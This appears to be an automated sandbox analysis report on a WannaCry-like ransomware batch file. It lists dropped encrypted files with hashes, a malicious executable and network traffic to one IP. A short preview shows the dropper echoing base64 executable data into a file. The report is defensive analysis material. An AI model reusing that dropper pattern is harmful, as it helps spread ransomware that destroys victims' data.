                                                  SHA-512:DC1D0180047D10F9F732E31076ABFD3295DAE9EBC12D1E8D5C9FCDB92373D9E62CC06C0FB830B9D916DC24EC56510900074E036C41063100703116CF2AF35F0C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8367109529083745
                                                  Encrypted:false
                                                  SSDEEP:24:bkm5hqfyh5CLtcXK0DPPWIwZD2zMq7jWe/sxJIXM3yRgpmjEw1QWR8Ge0XdrUjqq:bkkhqKmLWXKLDZD2Iq2e/sxJnyRgpwrk
                                                  MD5:5CF8BCD8E877DCD18344EE071EFA9988
                                                  SHA1:BE06FABCF53D7EA705E1219D008951F0BEB388D3
                                                  SHA-256:6603DCE04A70E2EF5596987085E637E85B829FCDD371C7E8A6F95E6C4C98BD52
                                                  SHA-512:F3DF8AB413A876BFEE7F5C1FB136D3E9F56762DCBD1E386E5251C24AD0352CB12CDF6BDE4090E6130D73611C1B2FCA340230F81D22B48A2B085788CCED861FF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823267939487966
                                                  Encrypted:false
                                                  SSDEEP:24:bk8zT1/wypS9agmTpMJUfxaZHCSAVKNuqPJSQ7XMNm12QbovcHiUz9R2Us:bk8zptpSELgyxaZfQK8mIg12/vyiM27
                                                  MD5:525A0649FEF34B4F81E6DB06A6FF4CDC
                                                  SHA1:DC187C9457E2ED4B53676F31205FDE169B84D6C4
                                                  SHA-256:65173F594FCDDE2297F5315B9358A6E0B55C6913DCDD489E859D594836E9B769
                                                  SHA-512:3635C9F801AA9F1D5FE8930960896356105D43DC8B9F3D7B12D6AD644CE713B5EB641DB8E458B6335F56D8F8F6E68416360633642320CC5CC2A3163B5EBD084F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.835498161095077
                                                  Encrypted:false
                                                  SSDEEP:24:bk4OUwwVzU3+88YYjxEm9QLagE/hzcKHobzvyICIvSMDbCP:bk4NJzUOTjxERLnQ+fbLvd6
                                                  MD5:72DFEB37ACC67B983749E8C74B46FC2A
                                                  SHA1:C31482D0ECC9BCC44384372087476BB598A56D0C
                                                  SHA-256:B0A2B11EC34E342FDE98961D74D72A822EEA979CA36A724F67AFF5090E775888
                                                  SHA-512:C96B37A4D54BD86416307448F06CA2ADE740DAE5B4D695984DEEA2A894BF74CC7883D42EF36A73D2ECA8D29FAD2BD14B976225C7EBF7D44357CFBC3E9AD1F131
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8499076220924024
                                                  Encrypted:false
                                                  SSDEEP:24:bkzavLWVlAMaudXjQJDdQtdM/ik6goq9lzucH7I0ZGJlN8Wy3r7IB:bkigKudX8JDKtGieoulzuy7Il8HK
                                                  MD5:6D335E493CF884A70D790D21957D9B4C
                                                  SHA1:6B4D8AA5A3A7D2A833414717D6B0F6FAB0BE03EA
                                                  SHA-256:FEE51911873E925840155B3EA8A7FF35CA273F7BB6C47D8786BDB1E06F52EA27
                                                  SHA-512:9775BEF0D7F2459AD1E4F36D1FBA55E814D0FA1E3B767935C169D169474435C2C1503D03D089C5E6B6D3D9BF9A27EB7312FE8FE2DB20606AC73A0FFDBEE5B16C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310281743865335
                                                  Encrypted:false
                                                  SSDEEP:24:bkzfHAypy1EFokhyB9Fg0+p+srtOxsabWZxHqmbnCRZx4Hn1qZmu:bkzvAUASThy9jsrtOGabWZxHgv4C
                                                  MD5:941586C6E485BD375206922574C513C7
                                                  SHA1:B930B5D9EA2D1705A447714AA17B8C4858EA28DE
                                                  SHA-256:2A5BC380F46EDF84E64EC578474ED3916B0FBC0C59529F850873E5587F576774
                                                  SHA-512:BA3B36B9C17FD2EB45E6006038CA86CE0B6DF0AD4F525DD0CCC72DA82604649950C44D37436F98B0D14342232BFC4B4EDE2A28DC088908201CDE693DC4E3EABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Ee...K..c...a...w..#x.....-......nr"i.E.B..g\.W.r...Sg..V3Z.oU.. V...^rL.Z.M'.Pg-..;..!:.De2_N.$c... g.L.=@........Fzu.L.g.J(.K..-C.J.O|...kFd..|$.....RU...q.......:m.2../..F.2...Z)f..L....#W....^..Lqn.=.,.U*.pk[W.a.F..yf_s(.}.A.........5.n................!...g}.WZ.A......UN....~.5.h.N..@.s....I../.W.a-..@...*KUAlpo.j3z..J.lc....//K.&&b.8M.....N....53...JD\...\@.(.{.F.)b9.p.v.5.>K6f.....t*...q..y...U..08.|H....B..].t...._$....?..l..B.f.<.'z.....J\...888.>k...#pq.....gE7..].........3.. ....N7.pZp.y..6..v~...3iO,...o...AAMO.S.~...M..g.).r..2U..=.i.)G..9....#fLq....T.+.f2/..{e...X.R.N.J..Y=.&".....O.gO.....].H..{3....W...R.T....;...-..PI~...s7......q...?..}..,.P.)9'.v*Jk....... ..........k..pq_.....fD.{R?vj..hd...|I.......zy.L.dJ}.. ..g.Q...h&.\.-:.R]..{n.G....+..5.#.....wCt..S..]K.?t.l.V......E>..B..h7.U..n..(.++.%.gJO.....b.T.e.UD..a...T...D...8s)(l.W.....q..$6.J./.z0.....0EN'|c&...!....&...sG..s.M.......8..s...K.:...... ]m.D...j99.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.835811531063345
                                                  Encrypted:false
                                                  SSDEEP:24:bkL9sxwsv/nmCd0fMwm+m+Kk+u6k2SdiUfEl0JleYLDJzva2kQtZpCxdyDY6PK5Q:bky2sHnhhwmL+Xp92SnE0SYnBvJt0d45
                                                  MD5:48E7B87DA6ABF247B58EEB642C769B27
                                                  SHA1:9FE89E25F93995F8E04847E797F6B9A0CC1787D5
                                                  SHA-256:FE0B07BCE39F9C549332EF567DBE810CABE11E010B1566F784635D2E3257EB50
                                                  SHA-512:DF7F3697EDF9B4277ED660B7769621875A4FA0032EA7D371F14C204DF4345392DBFCA394418FEA9C396453EFA757A84C0386F0E782FAEBDF4B037490FA2EC04E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........hu...N..."..b...}&..S3..fB..Wb..j..6W..H....X6.....ks".....5:.y.a.,fk..v.#..a...4E.....Y..@.+V.....i.&..y.#....pt..[I...)E...}..R..;i..b.C.|.:...3~......c.eRU\.o..B>...H.h....Pb...@...RFK.......en...V....!.\..vO.P.s.i.w..]9..bb....*..i..............x..u....+..r.Q.*..kK~a.U......V..u...?.^..&...,.;='...AF......s"......:zP.y...OM....B...]@......B.o:......M.......V....f.B.B.lv..v....N...r5..<..S/.:..+...T.cF..F..!.a..pO...V|R\.g ......m...G...)..!.o..2o$#.v.u..DKx..n.5..r....N...R...........)..rq..=.lw].......0.........4..Rl4..K....._...3.i..^......<'...t.....^..5....#If..M...MT._.V..r..........c.e..z.8..NP.#.8.v...\...b.8D.........GZX9..X.d...*..^....^E.k...+Cv]gn......}G,H.. .^....V.D.T.$Y.0.(HM....6.k.q.5.f_.V...mT..Q.?g.j~qP...!...........0..9..*.jE...T.G.5....E.."|..q....i..T.wo..j.....[.Jb|..zC.....?I.X.......<}g(......`$...[..t@.Zd.1.d.NUK.V.i...L Q.....>..T.t....~{"%......h..p...HW...6Q..u.,.u9..f6...=/..D1K..\aF...P_.\.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857345873249316
                                                  Encrypted:false
                                                  SSDEEP:24:bk+nlYLsOWwrc3mz68lzQmMW3tPI3pfYiN2I7fYO2Myu1G0Ex02TvziHP7MJvjrb:bknLsUcWuLmMWtAZQvGYmu7vziHP7mBd
                                                  MD5:47F102326749FF57A0732F884AF0266D
                                                  SHA1:77354DDD18E32BEAB839C1416C8F6F75F84A7BDA
                                                  SHA-256:308A19024B147FBC4BE87291F308F1B2BEFE8B5C9549412959D8753FE31877D7
                                                  SHA-512:1070E934DACDFD2DCDC37EA737191E72FC95ED60093A4A5089439CD2140481FAF7173DD5D3F276895E122B751035C003DBAB216DB47E8F44AB15456F4811BB2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....o...jF...a>.....k[.wN.D..sV.R...A..j!..]..LQ.....w|....1.h.v3..y..>0.^..#F]i5[....l[............~..9x..d...0O..=e....[...\..~9....M.AaB...W...G$......*1...e....)7.V...0R#\.v...K..X3d....*..ey...wi.o.)...w...YOC.p..N..47....S.,...5.....H(PJ.................C...as.PS.y'J2K*,....u.....a.tA."=..f.k^.S.=. .........T.e.....~.....h...9$9.~oX"&..,.7....v..i...V.).5.g..50..U._:K.zt...e..".MC...Ohq..ra...l.i........';hcADN.E.c...{...<..mY+...8......q.u.n..qu...I.u...&..d.L(..*..z...8..Q....qf}...X..6...p.|6S..@.Z.h.A=....!.......Y.....[T..~..`.x...+.q..).=.......~....9...i~r~G.8f.....t...:y...|h<<.b.7.v6A_.O..2.j...#. ~_....7..b...KX.....y=....r....[.!.I...3..;...3|..6.....T..P..="$.p..VW...o..6.~.....c..d.....%Y.v.R|..z .....R...f.Ga.CS......u.+U..,...`R.9.b.#l..l..ba..!,.....$u.:_.......J...}..$S.xR.JV....2Sb.....N+e.>u.^...*Q>.}W...w."M0dx.7...y....l..{@..ztr.m...h.....VX.Z.Q.,.L.....d.....8..36[[#1ua}.w.$...f.A.B...K.Vy.2.6....%v.[CF.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852353575907645
                                                  Encrypted:false
                                                  SSDEEP:24:bkmns7M68k6q89xg+q48lEqICiP4Psw1F6mXrBm89hxM8I:bkmnOHx6qlB4tqIGsw1F6KrBpFMj
                                                  MD5:B377A7AEFD366065EC2CEBBB6D7CD909
                                                  SHA1:4B9508A33FC5E7C8818471BA760B42271788AA65
                                                  SHA-256:158E4D6C1F955B94C9440F048FBAA612E3740268109F6A69A7808D4009F1BDE5
                                                  SHA-512:267C5DA8028447914B1DCA3A9289C195F6987973185028A9F6781D3397467CF3EDCE9A45D3260DD0834E52167FDCAD7DB523DE795F2339E72ECA01D27FACA720
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....r.;7J..6.V.....{.).C.a}O@..a^...I..N.C.Gp...b.H....=.%.O^....5`..3hH?L.F._.#A...^..v.~.W\C.{.....I.SC...(...x..'j.P$.&...thHM4x5..E.~f.....L.....1}.3..Ea+jd.....z.J.D.G..y..&.5...)../3..C{w.|,....k......M...u.m.4.C.H_..../..o..".......O.L$.f................2x..EDT?O../..>.s.;......bD..._.<..0."..v=.%"...p.3..th.s..*..U......f.'.i...Yt]CM.........Ooo..w.....X...g5..#.4<.#R.Hc..U./.Q].....~Q....]..K`..5....E3.?.6y...o...}..D..K.W.r.9=...p..-3.Fy....XS.O....*.T.../......."x..`9.....g.5sh.X..J.,....L...SN-.+l.]N....q.....[.J...........z.6..]w..K@...`..Qc.......,....n..iV=...".....> i...&..%a0".w.~`IZ.$....>.Q.y.Q....w.........H(,x....c....R.~......8.#.......n.p..Fur...%.........`..Tgp.T.....HF...L..A.z;.W...x...x..&.y.OX...~ ....y.3m..3.#...Y..B.F^...1,.7....Ss<b..<..e.W9..j..r.....2...!..\~S...+-..<...Pt...O:....O.-...X.vH.q|..F..h(..C~....v..-.J:.KSY...=Q..L......q..~M.h........S...T..P..eek..T%.>T..N...;.=..+[....&.{..
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):48
                                                  Entropy (8bit):4.305255793112395
                                                  Encrypted:false
                                                  SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                  MD5:6ED2062D4FB53D847335AE403B23BE62
                                                  SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                  SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                  SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:ERROR:...Description = Initialization failure...
                                                  File type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Entropy (8bit):6.009118235585824
                                                  TrID:
                                                    File name:WannaCry.cmd
                                                    File size:6223568
                                                    MD5:8da35604db8350a0bbb7ac41e0609bb3
                                                    SHA1:6160e62c45e1fe8028da7aa8b9f5c1a4d9bf22c3
                                                    SHA256:5badd8294b5ab8aebdaef9cef14176ceb4765f170414042e828903e092d93686
                                                    SHA512:2d4dfe6f334c0a20d1fb66f7512b18699c2f7056624fff7fdbbf58383e07c22de0a76e903204fb8a1bb1e4414bfa73b95a07128823a0e964be4bf7344daa578d
                                                    SSDEEP:49152:mTlQjr91BV/MWMtZ9f0o/pCMcmkgvgplcvflU5tKE0qrwJu8W/9eL3:k
                                                    TLSH:6D56DE2135863ACED416DFB649F0AD1D6BF734233A028CD85897427A2D3FBC8791DA16
                                                    File Content Preview:@echo off..msg * Has Sido Hackeado!..echo -----BEGIN CERTIFICATE----->>WANNACRY.bin..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>WANNACRY.bin..echo AAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v>>WANNACRY.bin..
                                                    Icon Hash:9686878b929a9886
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    May 15, 2023 09:31:20.790837049 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790859938 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790936947 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790956974 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791016102 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791026115 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791090012 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791101933 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791162968 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791198015 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791245937 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791251898 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791342020 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791409969 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824301004 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824383020 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824440956 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824500084 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824520111 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824601889 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824662924 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824670076 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824742079 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824800014 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824807882 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824876070 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824888945 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824937105 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824968100 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825030088 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825036049 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825102091 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825130939 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825182915 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825239897 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825268984 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825318098 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825340033 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825393915 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825438976 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825438976 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825478077 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825537920 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825573921 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825620890 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825627089 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825671911 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825711012 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825767040 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825808048 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825841904 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825855017 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825906992 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825936079 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825992107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826033115 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826066971 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826126099 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826133966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826133966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826283932 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826292038 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826358080 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826411963 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826437950 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826489925 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826518059 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826565981 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826591015 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826643944 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826663017 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826719999 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826761961 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826792002 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826814890 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826869011 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826879025 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826944113 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826953888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827018023 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827040911 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827094078 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827111959 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827159882 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827183962 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827241898 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827248096 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827311993 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827356100 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827356100 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827394009 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827457905 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827474117 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827536106 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827543974 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827599049 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827627897 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827686071 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827692032 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827755928 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827797890 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827797890 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827842951 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827903032 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827909946 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.827974081 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.827996016 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828095913 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828095913 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828169107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828228951 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828284025 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828341007 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828347921 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828347921 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828428030 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828437090 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828488111 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828520060 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.828588963 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.828670025 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861176968 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861432076 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861448050 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861463070 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861478090 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861493111 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861505985 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861522913 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861538887 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861553907 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861556053 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861573935 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861589909 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861604929 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861607075 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861627102 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861638069 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861654043 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861655951 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861655951 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861655951 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861655951 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861680031 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861695051 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.861702919 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861702919 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861702919 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861752033 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.861799955 CEST4983780192.168.11.20171.25.193.9
